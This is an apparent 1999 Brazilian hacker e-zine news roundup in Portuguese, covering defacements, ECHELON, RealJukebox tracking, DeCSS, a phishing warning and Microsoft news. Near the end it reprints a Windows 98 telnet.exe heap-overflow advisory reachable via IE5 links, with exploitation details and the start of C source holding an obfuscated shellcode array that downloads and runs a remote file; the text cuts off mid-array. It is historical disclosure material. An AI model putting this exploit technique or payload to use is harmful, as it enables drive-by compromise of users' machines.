NEWS - DICAS - LINKS - HUMOR - MISCELÂNIA 22

Estão aparecendo hipóteses para deixar o homem mais ligado com o computador. A idéia é usar um chip para enviar impulsos nervosos ao cérebro e controlar a depressão. E a idéia está pegando adeptos lá nos EUA. Realmente, quem não se lembra o passado está condenado a repeti-lo. Não sou nada contra o bem estar das pessoas. Mas se é possível fazer um chip para controlar o estado emocional da pessoa, não seria possível fazer um chip para controlar a pessoa?

http://cnnenespanol.com/salud/1999/

10/12/marcapasos.cerebro/index.html

Saiu na Folha 14 de Outubro de 1999 - O cara suspeito de estar envolvido no grampo do BNDES, técnico Walter de Souza Braga foi funcionário da antiga TELERJ. Por estar envolvido em gravações ilegais já naquela época. Será que as telefônicas atuais estão com funcionários responsáveis e que zelam pela privacidade da comunicação do cidadão? Ou precisa aparecer um escândalo de grampo com gente graúda para o cidadão pode estar tendo seu telefone grampeado ou sua correspondência lida?

Será que não estão exagerando os danos provocados por hackers? Aqueles que estão acompanhando o caso Mitnick (http://www.freekevin.com) viram como, de uma hora para outras, as empresas supostamente atingidas por ações supostamente cometidas pelo hacker trouxeram estimativas que mais tarde foram comprovadas  "pouco acuradas". Começaram com $299,927,389.61 e depois caíram para meros $1.5 million (ver zdnn ).Nessa págin no http://www.aviary-mag.com/Martin/

Defacto_Damage/defacto_damage.html , Brian Martin comenta algumas coisas interessantes. Como por exemplo, o SPA ( http://www.spa.org/piracy/programs/98table.htm ) pode avaliar prejuízos com a pirataria de software em exatos $3,074,266,000,00 ? Uma idéia é que existe uma necessidade de que o prejuízo atinja determinado valor para que valha a pena sua condenação. Então, US$ 10.000,00 é pra fazer o FBI se interessar. O número de zeros é para fazer o público prestar atenção na soma do prejuízo e começar a protestar.

Por outro lado, me lembro quando as primeiras notícias e emails sobre roubo de contas correntes ou de caderneta de poupança bancos via internet começaram a aparecer na Internet. Sempre o banco dizia que era culpa do cliente. Eram notícias esparsas e não muito detalhadas. A televisão mal noticiou qual os bancos eram mais afetados. Custou muito a admitir que pudesse haver falhas com o sistema de senhas, já que os alvos eram em vários casos, pessoas de idade. Precisou acontecer um número significativo de clientes afetados. Tudo isso para uma coisa que foi comprovada insegura há varios anos, pelo Chaos Computer Club, na Alemanha, ver http://www.ccc.de/radioactivex.html. Estranho, né? Ainda assim várias reportagens insistiram em falar que os responsáveis por essas fraudes por computador eram hackers. Ladrão de banco virou hacker, agora? Uma coisa que pode até estar sendo feita internamente é obra de hackers? Mais alguns sites sobre o assunto:

http://www.roachmill.demon.co.uk/demo/activex/index.htm

http://www.geog.ubc.ca/snag/bugtraq/msg00602.htmlhttp://www.microsoft.com/security/bulletins/ms99-037.asp

De acordo com o IDG Online, 16/08/99, o governo americano está procurando cybersoldados. Os caras vão ter que substituir 32 mil caras ano que vem, conta da aposentadoria.

Os caras que invadiram os sistemas da Nasa e do exército americano em 96 , os suecos Charlie Malm e Joel Soederberg, foram processados.. parece que serão multados, mas não vão puxar ferro por conta disso, já que nada foi roubado. http://dailynews.yahoo.com/h/ap/19990816/

wl/sweden_hackers_1.html

O FBI fez um vídeo sobre hackers e high-tech crime. Pra ver se encoraja as empresas a divulgar os problemas que tem com crime por computador. O pessoal lá da Hackernews e computer underground está doidinho da silva pra botar a mão numa cópia desse vídeo. Eu também. Porquê? Porque existem crimes por computador feitos por funcionários de dentro das próprias empresas. E algumas empresas não revelam nada não é só por temor de parecerem incompetentes. Mas também por medo de exporem estruturas de comando deficientes, gastos mínimos com treinamentos ou sei lá, quem sabe, existência de caixa 2? Pra não falar em desavenças trabalhistas que geram funcionários rancorosos capazes de ir a forra via computador.. É, talvez o vídeo convença Enfim.. essa notícia tá no URL: http://dailynews.yahoo.com/headlines/local/state/

colorado/story.html?s=v/rs/19991118/co/index_2.html#3

Tão falando que a lei de crimes de informática está chegando.. 3 anos de prisão no máximo e 4 se o crime informático for cometido contra o Estado. (InfoNews, 06/08/99) .

Essa foi muito legal: hackearam uma página anti-gay lá nos EUA. Achei engraçado, mas tambeém tem o fato que isso trouxe uma baita publicidade para a mesma.. http://cnn.com/TECH/computing/

9908/23/hack.folo/index.html e http://www.wired.com/news/news/

politics/story/21351.html

Lembram do tal hacker israelense, aquele que virou manchete em todo mundo por invadir o Pentágono, lá nos EUA? Não sei se aconteceu alguma coisa a ele, mas o John Vranesevicc,ou JP, do Antionline, o site responsável pelas entrevistas com o cara e com muitos outros pretensos ratos de computador, tá na lama. Pior que titica de cavalo de bandido mexicano. O pessoal está direto desmascarndo o indivíduo como tendo feito um site de notícias  "hackers" pré-fabricadas. Uma idéia interessante: o cara quer se promover como pseudo cracker, hacker ou o que seja. Vai no Antionline (ia, agora a coisa tá brava). Faz uma coisa qualquer e divulga. Em outras palavras, criava notícia exclusiva para o site. Que apareceu na TV, começou a receber patrocinadores e coisa do gênero. Tá todo mundo tacando pedra. Veja umas partes da da história em http://www.attrition.org/negation/errata.html , http://www.forbes.com/columnists/penenberg/1999/0927.htm , http://www.hackernews.com/orig/CWD0899.html , http://www.nytimes.com/library/tech/99/

10/cyber/articles/08hackers.html . Tá querendo ganhar dinheiro com hacking, tirou o Packet Storm do seu site, enrolou e enganou gente. Merece o que está recebendo. (origem: http://www.hackernews.com)

Vai rolar uma conferência hacker na Colômbia. Fui na página deles (http://colcon.virtualave.net ), algo pesado e difícil de entrar, precisa de Netscape 4.X. Pelo que entendi do FAQ, ainda estão decidindo coisas como preços, palestrantes, etc. A data vai ser 6,7, 8 e 9 de janeiro. Se eu tivesse dinheiro, talvez arriscasse. Talvez. A Colômbia está na relação World's Most Dangerous Places (Lugares mais perigosos do mundo). O Brasil por enquanto ainda não entrou na lista. É uma conferência local, pelo que entendi. Vocês me perguntam:  E no Brasil? Eu respondo: Tamos próximo da votação de uma legislação anti-hackers. Periga da elaboração de tal conferência estimular uma lei proibindo a mesma. Que tal? E uma conferência demora meses para ser organizada, quando não se tem dinheiro bancando.

FAMOSO SITE DEIXA DE EXISTIR - PQP JÁ ERA! - Veja uma parte da carta de despedida abaixo.

É o fim do mundo como nós o conhecemos

A partir do dia 01 de novembro de 1999, a PQP cessará suas atividades e deixará de existir. Foram mais de dois anos trazendo o que havia de melhor em humor e diversão na Internet. O aclamado, polêmico e divertido site que entrou para a história da Internet brasileira vai deixar uma lacuna em branco no coração de todos os fãs...mais de 12.000 acessos por dia...dezenas de reportagens, prêmios, indicações....mas nada dura para sempre.

Chega um momento em que você é obrigado a tomar decisões que vão influenciar o resto da sua vida...vivemos fazendo isso a cada minuto, a cada segundo, a cada decisão tomada, pois senão, ficamos presos no mesmo lugar, parados, até a morte.

E, por esse motivo, a PQP tem que deixar de existir. Para que venham novas idéias, para que surjam novos horizontes, para que cresçam novos ideais, para que possamos enfrentar novos desafios!

Agradecemos a todos por esses dois anos inesquecíveis, onde aprendemos e crescemos muito, como pessoas e profissionais. Fica aqui um grande abraço, e a promessa de que esse não é um adeus - e sim um até logo!

A gente se vê por aí!

A Ex-Equipe PQP

Mas achei melhor o que li na Gazeta Mercantil, tem um caderno de TI (Tecnologia de Informação) e estavam falando justamente de hackers, segurança informática e assemelhados. Só que colocaram umas estatísticas legais: os invasores externos representam o maior medo de administradores de sistemas. Mas o que causa maior dano é o usuário destreinado. Esse é o que ainda provoca maior dano, vindo os usuários não autorizados em seguida ( O principal 'hacker' está na empresa São Paulo, 8 de junho de 1999, Perigo maior está na falta de treinamento SÃO PAULO, 21 de setembro de 1999). Os invasores externos contam menos de 15% dos prejuízos, segundo mapa fornecido pela Ernst&Young. Em primeiro lugar estão as falhas de sistemas 67%, Erros não intencionais com 61%, Vírus com 46%, etc Mas o medo dos hackers lidera no  öque as empresas mais temem". 49%, vindo o medo de Funcionários não autorizados em seguida, com 46%.

Ano 2000 está chegando.. vc já cancelou seu cartão de crédito? Ouvi um papo que os bancos não estão preparados para o bug do milênio.

Um "hacker" enviou uma cartinha pro IDG! Falando que ia abandonar essa vida de crimes. Achei meio estranho, podia enviar pro Barata Elétrica. Mas tudo bem, eu demoro, mas publico. Tá lá embaixo, a dita:

"Aviso:  Este texto foi escrito por globher, e pode ser distribuído e publicado por qualquer brasileiro, contanto que não modifiquem seu conteúdo.  Como a maioria dos "hacks" são feitos:  A maioria dos hackers utiliza um método bem simples para hackear sites, eles hackeiam usando o FrontPage Explorer.  Fixando seu servidor:  Para fixar seu servidor, basta remover as extensões do FrontPage ou configurar as permissões dos arquivos criando contas ou colocando a conta guest para somente leitura.  Extras:  Espero que este texto ajude você a fixar seu servidor e a evitar ataques hackers. Mas lembre-se, nenhum servidor é 100% seguro.  Por que escrevi este texto:  Esta é a ultima vez que devo acessar a Internet, por um bom tempo pretendo sair do mundo underground, pois percebi que hackear sites não ajuda em nada a melhorar o Brasil. Neste e-mail você encontra um texto escrito por mim explicando como fixar os servidores e aconselhando os jovens a não fazer o que eu fiz. Sinta-se livre para publicá-lo em seu site.  Eu percebi que não é hackeando sites e prejudicando administradores que eu vou ajudar a melhorar o Brasil. Percebi que eu posso ajudar mais, dando comida a um faminto do que hackeando sites e colocando a culpa da situação atual do Brasil em outras pessoas.  P.S.: Eu não quero amenizar minha culpa por ter hackeado sites. Escrevi este texto para evitar que outras pessoas façam o que eu fiz 

Deve ser por isto que um outro "hacker" que invadiu a NASA deixou sua mensagem lá. (contribuicao da Eliz, a feliz)

---------

http://www.attrition.org/mirror/attrition/1999/11/28/acquisition.jpl.nasa.gov/

Só pra aproveitar, o grupo Infernobr me mandou esta cartinha:  Oi Derneval,  vc q sempre acompanhou a cena brasileira e concedeu um espaco na BE, estamos  reportando algo interessante  Ordem dos advogados do Brasil (OAB) - www.oab.org.br foi hackeada pelo grupo inferno.br hoje (segunda).  Veja o mirror no site da Securenet http://www.securenet.com.br/mirror/nov99/www.oab.org.br  Veja a reportagem na IDG http://www.uol.com.br/idgnow/inet/inet1999-11-29e.shl  Veja a reportagem na Securenet http://www.securenet.com.br/cgi-bin/news?query=29119906

Valeu terem enviado, mas pessoalmente, não acho isso interesante. Vai estourar numa lei anti-hacker bem severa. E a OAB não é exatamente culpada da quantidade de problemas que assola o pais (muito embora alguns advogados "péssimos" tenham passado no exame da ordem). Sou pela ordem. Este troço de haquear páginas do Governo para aparecer não é a minha praia. Até o Governo fala mal do governo, hoje em dia. Eu acredito que o que eles querem e' estimular a entrada de uma legislacao anti-hackers. Pelo que pude descobrir varios sao caras entre 20 e 35 anos, com solida carreira na informatica. Sao analistas de sistemas querendo faturar como analistas de segurancas bem remunerados. Num dos casos, os caras ja' haviam feito analise das insegurancas dos sites do governo. Que tem mania de usar software da microsoft cheio de aberturas. As noticias desse gênero deixam meio p(*) da vida um pessoal responsável por outros sites, baseados em Unix, que estão patcheados e ninguém entra. Achar um site inseguro e' questão de procurar.

Versão final do regulamento para uso das redes de TV por assinatura pelos provedores de Internet finalmente sai. A Anatel publicou a coisa. Resta saber se vai funcionar. Espero que sim. Muita gente vai passar a noite em branco, ao usar internet via TV a cabo. http://www.anatel.gov.br/home/default_popup_flash.asp

O linux vai virar o sistema operacional oficial do governo chines. Pois e', O que a Microsoft não conseguiu, a GraphOn foi la' e fez. Ponto para a Geração GNU. http://uk.news.yahoo.com/991110/22/ax8w.html

Esta foi de amargar.. um sujeito escondeu um telefone celular lá dentro para contrabandea-lo dentro de uma prisão a 150kms de Bogotá, na Colômbia (11/10/99).. ia ganhar 100.000 pesos se conseguisse. http://cnnenespanol.com/rarezas/1999/10/11/telefono.ap/index.html

Um grupo criminal russo conseguiu acesso ilegal ao servico de noticias da Reuters. A parte mais chata da coisa e' que eles estavam vendendo esse acesso. Nao houve uma grande esperteza nessa estoria. Os caras simplesmente contrataram os servicos atraves de uma empresa de fachada. http://library.northernlight.com/FC19991102530000207.html?cb=0&dx=1006&sc=0#doc

Romania: Algum "esperto" entrou numa pagina do governo e alterou a taxa de cambio do dolar e o imposto do salario do trabalhador. Por um dia, a coisa funcionou, quer dizer, ninguem notou. Ainda estao investigando a hackeada. Ate' que foi algo nao muito terrivel, porque qualquer pessoa que olhasse iria notar uma taxa de 100% de imposto em algumas profissoes (variava de acordo com a desimportãncia). http://news.cnet.com/news/0-1005-200-1427148.html?tag=st.ne.ron.lthd.1005-200-1427148

MTV FOI ENGANADA.. Os caras resolveram fazer uma reportagem sobre hackers para um programa da MTV, chamado Vida Real. (True Life: I'm a Hacker). A idéia é aquela mesma que todos os jornalistas já tiveram. Porque não pegar um cara que já fez crimes informáticos e botar ele para contar sua história. Conseguiram um sujeito, de nome Shamrock, que concordou em explicar tudo, tudinho. De acordo com o cara, ele nunca esperou que a MTV realmente  "engolisse " a história que tinha inventado. Na página http://www.hackernews.com/orig/shamrock.html tem um bom relato da história. Primeiro, os caras da MTV pediram uma help pro sujeito, que fazia um lance de Web TV onde o espectador tem acesso ao cara da reportagem e a outros espectadores que estejam assistindo o programa (ver parstv.com) Aí o sujeito passou para eles alguns sites básicos, gente nos EUA que mexia com o assunto, tipo 2600, HNN, Defcon e L0pht. A MTV foi atrás desse pessoal, filmou e prometeu pra todo mundo que seria algo  "honesto". Mas não era o suficiente para a direção do programa, eles queriam algo  "mais underground". Então é que o pessoal do Shamrock fez a armação toda. Parece que incluía cenas do sujeito "invadindo" sites, passando informação  "sigilosa" em disquete, fugindo da polícia. Esse tipo de coisa. E os caras da MTV  "engoliram". O Emmanuel Goldstein da 2600.com, até comentou como foi em http://www.hackernews.com/orig/emmanuel.html . Disse que concordou com a filmagem principalmente porque poderia ajudar o Mitnick. Para finalizar, cheguei a ver a página do programa, antes de tirarem do ar. Infelizmente não fiz download das gifs, htms e RAs, no dia seguinte não estavam mais lá. Eles se deram conta da mancada que deram e que foi noticiada por aí, veja em:  http://www.zdnet.co.uk/news/1999/41/ns-10798.html

A moçada lá resolveu fazer  "passeatas eletrônicas" contra a "escuta internacional". Aqueles que leram meu artigo sobre isso, já conhecem o lance (disponível em https://sites.google.com/site/barataeletricafanzine/Home/grande20-html ). Pra simplificar, tem um monte de escutas nas redes de comunicação do mundo inteiro. Essa escuta beneficia só alguns países e governos. Como envolve correio eletrônico, a moçada estava se propondo a emitir correios eletrônicos cheios de palavras chaves, para confundir e ativar os programas de escuta (que nem acordar aqueles caras que só prestam atenção em conversas que tem assuntos que interessam, como dinheiro, mulher, falando essas palavras). Existe alguma coisa sobre essa campanha na página http://cnn.com/TECH/computing/9910/22/internet.spying.ap/index.html . Que fez sucesso pois foi publicada em jornal. SE realmente conseguiram confundir as escutas? Provavelmente não, mas divulgaram sua existência, algo antes considerado como paranóia.

O pessoal esta' cada vez mais publicando noticias do ECHELON. Depois de fazerem um dia anti-echelon, cada vez mais aparecem artigos na imprensa nao especializada. Para quem nao sabe, esse sistema espia cada fax, telefone ou correio eletronico que passa pelos satelites do mundo. Transforma voz em texto e procura palavras chaves, como "terrorismo", "matar presidente dos EUA", etc. Se detecta essa ou aquela palavra de uma lista, ele comeca a copiar a comunicacao onde "escutou" a coisa. Para posterior exame. O dia do Echelon era uma ideia de entupir a rede com palavras que fizessem soar o alarme. Especialistas acreditam que a coisa do ponto de vista de software, nao funcionou. Mas em propaganda, parece que sim, porque mais e mais publicacoes estao alertando para algo do qual nao se falava. Ver os links abaixo:

http://news.bbc.co.uk/hi/english/world/newsid_503000/503224.stm http://xechelon.org/

http://www.fcw.com/pubs/fcw/1999/1115/web-echelon-11-18-99.html

Foi constatado que a companhia responsavel pelo software RealNetworks' RealJukebox esta' fazendo "escuta nos habitos dos seus usuarios. Quer dizer, o sujeito que usa o software acima tem suas preferencias em relacao a musicas, o que ouve e o que GRAVA. Ou seja, ao fazer download de uma musica a partir da internet, jogar uma musica do cdrom no seu micro ou simplesmente tocar esta musica no seu leitor de CDROM, isso e' informacao que e' armazenada, reunida num GUID (Global User Identification Data?) e mandado depois para a empresa. O perigo nao esta' tanto no ato em si. Mas se voce pensar no sonho do Bill Gates, de fazer todo mundo usar uma carteira contendo cada minuto de sua vida, isso e' perigoso. As pessoas nao podem ser vigiadas quando vao no banheiro ou quando gastam seu tempo livre. Hoje, se vigia qual musica voce gravou de um CD. Amanha, vao te cobrar um taxa por ter feito isso. Ja' pensou?

http://news.cnet.com/news/0-1005-200-1425866.html?tag=st.ne.1002.thed.1005-200-1425866

Depois que descobriram isso, a companhia mudou um pouco a política interna de privacidade

http://home.cnet.com/category/0-1005-200-1426044.html

Um artigo da Wired esta' colocando o Richard Smith como um "tesouro vivo" da Internet. E', ele ajudou a localizar o autor do Virus Melissa, a questao do GUID (um numerozinho que fica nos documentos feito pelo word 97 e que permite voce atribuir um arquivo como sendo feito num computador de fulano XXX), as praticas de coleta de dados da RealNetworks (que fornece um software de escuta de CDs pra micro onde as preferencias do usuario sao armazenadas e enviadas pra RealNetworks, uma forma de se fazer pesquisa de opiniao de musica sem o cara estar sabendo). O artigo sobre ele comenta seu interesse "desinteressado" pela privacidade na internet. Acho otimo ter um cara desses por ai'.. o duro e' acreditar que o cara e' um bom samaritano, mas legal que gente como ele exista. Palmas pra ele. http://www.wired.com/news/technology/0,1282,32252,00.html

Trata-se de uma historia sobre um jogo de guerra desenvolvido e executado para simular uma acao real de conflito em que ataques de forma eletronica sejam executados. Para quem nunca jogou "WAR", esta simulacao nao precisa envolver computadores. Apenas se joga com umas variantes, como "organizacao terrorista usa computador pra sacanear com sistema telefonico" e por ai' vai. Como se considera atualmente que os EUA estao despreparados para ataques desse tipo, a inteligencia norte americana comecou a fazer uns estudos de simulacoes desses acontecimentos. Maiores informacaoes na pagina. http://www.latimes.com/news/asection/19991031/t000098778.html

"Uma típica Sexta a tarde de chuva, em São Paulo [..] : ruas cheias de lixo com inundação, rios nas principais avenidas, trabalhadores presos no tráfego por horas, blackouts e fones não funcionam.." http://news.excite.com:80/news/r/991119/15/tech-yk-latam Este artigo comenta que os latino-americanos (nos brasileiros incluso) estamos tão acostumados com enchentes, desgraças de todo tipo que nem levantamos o olho para uma coisa chamada Y2K. Parece que foi um brasileiro(a) (da Mary Milliken) que escreveu o texto, está muito engraçado.

Uma tentativa de impedir que qualquer um tenha acesso a sua informacao medica. Ou seja, se voce ja' foi alcoolatra, se ja' transou sem camisinha (contraiu sifilis) ou coisas que podem ser embaracosas em algum momento de sua vida (como numa entrevista pra emprego). O presidente Clinton fez um plano que coloca restricoes em como essas informacoes estao sendo usadas. As pessoas envolvidas teriam que ser notificadas quanto ao uso das informacoes e deveriam ter facilidade para altera-las. Claro que nao e' tudo o que se espera. So' a partir de 21 de fevereiro e' que isso vai acontecer. Aqui no Brasil, mal se tem o habeas data e poucos advogados sabem usa-lo. http://www.zdnet.com/zdnn/stories/news/0,4586,2384723,00.html?chkpt=zdnntop

Quebraram a protecao de filmes DVD Hoje, os arquivos dvd nao sao copiaveis. Sao filmes de cerca de 4.7 Gigabytes em diante. A partir do ano que vem, se espera uma geracao de gravadores que permitam esse tipo de coisa, vao pintar drives DVD regravaveis pro publico comum. Entao, presumindo que um cara realmente quisesse usar isso, os CDs DVD estao protegidos por um software chamado Content Scrambling System (CSS), que usa chaves de 40bits. Era considerado um esquema de protecao forte. Mas uma empresa esqueceu de encriptar a chave do DVD e 2 caras descobriram mais info sobre o esquema de protecao. Fizeram um programinha de 60kb, o DeCSS, capaz de copiar o bagaca toda. Cada disco teria umas 400 chaves de descriptografacao. A ideia era que nao se pudesse fazer engenharia reversa e descobrir como funciona o software. Mas bastou esse descuido e agora esta informacao esta' por ai', rolando em algum lugar da NET. http://www.wired.com/news/technology/0,1282,32263,00.html

O Bruce Schneier, grande especialista no assunto (tô caindo de sono, esqueci o livro do cara) botou um texto sobre o assunto, disponível em http://www.zdnet.com/zdnn/stories/comment/0,5859,2391975,00.html

O pessoal que faz os DVDs é que não tem muito senso de humor, estão fazendo uma caça as bruxas e várias páginas sobre o assunto, muito bem desenhadas mesmo estão saindo do ar, por medo de represálias de vários tipos. O software ainda pode ser encontrado em alguns lugares e um  "Digest " sobre DVD está se mantendo no ar, apesar dos pesares. Quem procura, acha. http://www.wired.com/news/politics/0,1283,32449,00.html

Ainda existe esperanca. O congresso norte-americano nao esta' financiando a fundacao de uma rede de seguranca contra intrusos. E' aquela coisa.. a intencao explicita seria combater terroristo on-line. Mas e' uma coisa que pode ser usada para vigiar pessoas online e off-line. Resultando que poderia ser usada para invadir a privacidade de gente como a gente. Ainda bem que la' nos EUA estao brecando isso. Apesar que tambem se esta' falando que os defensores do projeto vao continuar tentando.http://www.govexec.com/dailyfed/1199/110399b3.htm

Informe Oficial da II Expo Salt Dias 29 e 30 de Janeiro de 2000 Rio de Janeiro - Niteroi

A ExpoSALT oferece à comunidade acadêmica o II Evento de Sistemas Alternativos, com a presença de Grupos de Usuários de Linux, AMIGA, OpenBSD, BeOS, MSX, FreeBSD entre outros.

O evento será realizado nos dias 29 e 30 de janeiro de 2000, na Escola de Engenharia da UFF - Av. Passos da Pátria, 50 - Campus da Praia Vermelha (Praia da Boa Viagem), na cidade de Niterói/RJ, este além das Palestras Tecnicas que ofereceremos, teremos: Mini-Cursos, Foruns de discurssão, Feira de empresas, Stands de Grupo de Usuários/Empresas e o 1o Install Fest de Linux Carioca.

A Associação SALT tem como o objetivo à divulgação de atividades nas áreas de sistemas alternativos, em andamento ou recentes, e incentivar a integração e o intercâmbio entre empresas, professores programadores e estudantes de diversos centros do país.

Assim, reunimos uma vez por ano, em Janeiro, para a realização do único evento voltado a sistemas operacionais alternativos e que tem como objetivo principal a divulgação de e a apresentação de soluções em informática baseada nos mesmos.

A ExpoSALT 2000 contará com palestras/apresentações sobre os seguintes sistemas operacionais e/ou plataformas alternativas:

- Amiga (AmigaOS) - BeOS - FreeBSD - Linux - MacIntosh (MacOS) - OS/2 - QNX - Tropix - DosVOX

Maiores informações (incluindo descrições mais detalhadas das palestras e informações sobre os ministrantes) podem ser encontradas na página do evento: http://www.wb.com.br/exposalt.

Informações sobre as inscrições para o evento também podem ser encontradas na mesma página.

NÃO É PIADA

Isso apareceu na lista Piadas -l

> Recebemos recentemente um aviso sobre um novo golpe que está

> sendo praticado e gostaríamos de alertá-lo sobre este golpe:

> > "Assaltantes astutos estão atacando de uma nova forma. Mandam

> mensagens falsas para seu e-mail, fazendo-se passar por seu

> provedor e pedindo para que você confirme o seu endereço

> residencial para recadastramento.

> > Utilizam-se de e-mail fantasma, geralmente HOTMAIL, ZIPMAIL ou

> MAILBR. Com o endereço em mãos, organizam um assalto à sua

> residência. Talvez após dias ou até mesmo meses.

> > Segundo a Polícia, estes bandidos estudam o seu cotidiano e,

> quando encontram uma brecha, realizam o assalto. Muitos casos

> semelhantes aconteceram em São Paulo e, depois de longas

> investigações, descobriram que as vítimas tinham algo em comum:

> eram Internautas.

> > Quando verificados mais detalhes, uma surpresa: todos haviam

> recebido esse e-mail, solicitando a confirmação do endereço e

> de alguns dados como: quantos aparelhos de televisão em casa,

> aparelhos de som, veículos, casa própria ou não, etc..., ou

> seja, perguntas típicas de cadastramento mas que, na verdade,

> servem de informação para os assaltantes saberem dos bens que

> existem na casa a ser assaltada.

Sobre a Microsoft..

Grande BUG - O Service Pac 6 da Microsoft impede o acesso ao LOTUS NOTES. Essa é curiosa. Porque o único jeito de usar o programa nesse caso seria fazer o NT dar privilégios de super usuário para os usuários comuns. Ou isso, ou as mensagens "Could not connect to server" "Access denied" aparecem.(fonte:Noticias Hispasec - 16-11-99) Quando me lembro que a prefeitura de São Paulo tem uma intranet baseada no Lotus Notes, fico pensando o que é atualizar os NTs de lá. Qualquer funcionário do baixo escalão podendo olhar mensagens do alto escalão (claro que tem ser bonzinho em computador) sem grandes problemas. Para ler mais:

http://support.microsoft.com/support/kb/articles/Q245/6/78.asp

http://news.cnet.com/news/0-1003-200-1439342.html?tag=st.cn.1.lthdne http://infoworld.com/cgi-bin/displayStory.pl?991116.pinotesbug.htm

Página comentando que a principal causa de perda de dados são apagamentos acidentais. Num teste realizado com 300 administradores de maquinas NT, 88% disseram que a principal causa de perda de dados sao apagamentos acidentais. 7% dao como causa apagamentos intencionais e 3% poem a culpa em virus. O uso inadequado de backups e' uma constante nessa percentagem de perda de dados. http://www.techweb.com/wire/story/TWB19991029S0008

Achado vírus de NT, o WinNT.Infis. Normalmente isso parecia coisa acadêmica, mas o bicho não só existe como foi encontrado  "in natura" (descoberto por uma vítima na Rússia). Ataca estações de trabalho operando com NT 4 e service packs 2,3,4,5 e 6. É um novo capítulo nessa história (Network World Online 11/10/99)

Falas-se da decisao de um juiz federal nos EUA. Finalmente se julgou a Microsoft culpada de monopolio. Pelas seguintes razoes: mercado amplo e estavel em todos os pcs baseados em chips intel, praticas anti-competicao etc.. Isso vai facilitar muito para outros processos contra a empresa, ja' que nao terao que provar o mesmo tipo de coisa (se fosse no Brasil, essa vitoria nao significaria nada pra quem estivesse correndo processo contra a Microsoft). Pode ser que isso signifique o desmembramento da empresa. http://cnnfn.com/1999/11/05/technology/microsoft_finding/

O site da Microsoft foi invadido. Ver http://www2.uol.com.br/info/infonews/101999/26101999-19.shl ouou http://www.msnbc.com/news/327726.asp?cp1=1

Como se livrar do Explorer no Win 98 http://www.98lite.net.

Recebi essa cartinha.. valeu Enigmatic

Heap Overflow in windows 98 Telnet.exe - remote via IE5

------------------------------------------------------------

Jeremy Kothe (jeremy@edi.com.au or paceflow@hotmail.com)

More fun and games courtesy of Microsoft (c:)...

Telnet.exe - (77824 bytes, 11th May 98)

---------------------------------------

This version of Telnet (which ships as part of Windows 98)

has a bug which allows a heap overrun. It assumes

that the first command-line argument will be <255 chars

when preparing for the "Connect Failed" message-box. The

result is that a few crucial bytes can be written over,

which, as the telnet app is closing, allow full execution

of arbitrary code. See below for full details...

This is still all local, though, so let's skip to the

REMOTE part.

IE 5.00.2314.1003/5.00.2314.1003IC

----------------------------------

Internet Explorer automatically invokes telnet when given

an "rlogin:", "telnet:" or "tn3270:" protocol URL. Earlier

versions of IE which I experimented with had comparitively

tight restrictions on the format of the url, only allowing

two parameters through (two zeros to you and me ;) As it

turns out, this is not enough (for me) to exploit the bug.

But with the versions named above, which as of writing

include the latest version Microsoft would let me

download, the restrictions seem to have been lifted. I can

only assume that this is either unintentional, or that

tn3270 or telnet applications have been found which makes

this desirable... Whatever! The end result is that it

seems the most recent versions of IE 5 will faithfully

pass any collection of parameters up to about 460 chars

into telnet.exe.

Systems at risk

---------------

Windows 98 default installation with SOME versions of IE5.

If you click on a link, or are refreshed to a link, then

see telnet.exe pop-up, complaining that it can't connect

to a garbage-type address, DO NOT close the telnet

executable. Instead, either forcefully terminate the

process, or reboot. The exploit does NOT take effect until

telnet.exe is closing.

Solution

--------

Either remove telnet.exe from the path, so IE cannot launch

it, or get a copy of the WinNT telnet.exe.

Exploit - introduction

----------------------

Heap overruns are not for the faint of heart. If you have

trouble following stack overrun exploits, turn back now -

or go and learn, then come back.

With a stack overflow, getting the machine to execute into

our buffer is relatively easy. We have, after all,

overwritten the function return address. Point this

(indirectly or not) at the esp and you're in business.

Without this benefit, we have a much tougher time

exploiting the overrun. In fact it is entirely possible

that no exploit is possible.

It all depends on what follows our buffer in memory.

The best candidates for overwriting are pointers. If we can

overwrite one which the program subsequently uses, we have

a chance to make something happen.

The trick is to ignore what the program is trying to do,

and to look at what it's doing.

One core idea I've found to be of value is this: One way to

get execution onto the stack is to find a way to manipulate

our uncorrupted stack. Often you will find a pointer to the

stack (or command-line) somewhere not far from the top (of

the stack). If it can be moved only a few bytes, or we can

conspire to pop more than we push, we can then return to

our buffer.

Exploit - Intermediate - (Tools: SoftICE/IDA/PSEDIT)

----------------------------------------------------

The overrun we are presented with is only a handfull of

bytes, just enough to overwrite one pointer value following

the buffer in memory. This pointer, as it turns out,

originally points to an array of 1024 pointers, which are

either NULL, or point in turn to a 16-byte structure. From

context this seems to be a file-handle table of sorts.

When I examined the routine (fflush) where we end up

referencing the pointer, it turns out that the code

iterates thru the 1024 pointers, and for each non-NULL

entry, it examines and conditionally changes the 16 byte

structure pointed to. It is the change we are interested

in.

If the structure is represented as:

DWORD dw1, dw2, dw3

then the effect of the change is:

dw1 = dw3

dw2 = 0

Whilst examining various locations in memory where out

exploit string ends up (there are a couple, as the

command-line get passed, then parsed), I found one where

the following 4k was allocated and 99% zeros.

I also found at the top of the stack, about 12 bytes back,

a pointer to our exploit string (WinMain lpCmdLine anyone),

which was ripe to be copied down 8-bytes to overwrite a

return address.

Now ideally, if the memory I found was all blank, all I'd

need to do would be to arrange for the trailing bytes of my

exploit string to point to the appropriate place on the

stack. This last DWORD, followed by 1024 DWORD zeros, would

serve as a faux handle table which would overwrite a return

address with a pointer to our exploit.

Are you with me... If not, go back now.

In the actual case I found there were indeed 1024 zeros,

but there was also one non-zero DWORD directly after my

exploit and before the zeros. I needed to remove these

values for the table to not crash... so I used the same

technique over again to remove it - adding another entry at

the top of our table pointing to the offending location

neatly removes it, then the second entry does the actual

work, and the rest of the table is empty.

Done. Complete. Works.

Exploit Attached

----------------

I have worked out an exploit which downloads and runs an

arbitrary file, and have included the source for a Visual

C++ program to create a binary file containing the exploit

as a link. Add (for example) an html header and footer, and

you have it.

Notes: The exploit uses URLDownloadToCacheFile and WinExec.

Disassembling the binary file will show you the code

(strings have been xor'ed with 0xFADE).

Any comments on the exploit code would be appreciated.

------------------------------------------------------------

#include

#include

#include

void Usage( void ) {

printf( "Usage: exfact url(40) outfile\n" );

}

#define URL_OFFSET 48

unsigned char aSploit[] = {

0x72, 0x6C, 0x6F, 0x67, 0x69, 0x6E, 0x3A, 0x33,

0xDB, 0x3B, 0xDB, 0x74, 0x53, 0xAB, 0x88, 0xB2,

0x97, 0xB1, 0x94, 0xF0, 0x9E, 0xB2, 0x96, 0xDE,

0xAF, 0x8C, 0xB6, 0x9A, 0x95, 0xA9, 0x94, 0xB2,

